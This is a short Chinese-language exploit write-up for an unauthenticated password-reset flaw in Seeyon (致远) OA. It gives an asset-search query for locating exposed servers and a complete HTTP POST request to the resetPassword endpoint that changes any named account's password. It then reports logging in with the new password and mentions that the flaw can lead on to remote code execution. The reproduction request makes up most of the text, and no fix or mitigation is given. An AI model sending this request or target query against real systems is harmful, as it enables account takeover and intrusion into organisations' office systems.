登录 白背景

致远OA 前台任意用户密码修改漏洞

一、漏洞简介

致远OA 前台任意用户密码修改漏洞,攻击者可以利用此漏洞修改任意账号的密码,进而登录系统并获取密码被修改账号的访问权限,进一步的利用后台接口可以导致远程代码执行。

二、影响版本

  • 致远OA

三、资产测绘

  • hunterapp.name="致远 OA"
  • 特征

1702654441882-426cbc35-3df7-455b-a5e9-5f459acb5133.png

四、漏洞复现

POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: 192.168.31.163:81
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=481F3949B045D38D5B7507C6CEA92FDB; loginPageURL=
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 45

{"loginName":"test","password":"Stc456789"
}

1705151514905-db1ab6b9-7d34-4a35-a2f6-c82de4c14838.png

使用修改的账号密码登录

1705151561361-831a0c06-4770-40ca-83b6-be9c946b70be.png

原文: https://www.yuque.com/xiaokp7/ocvun2/bmt64aogc9hi263l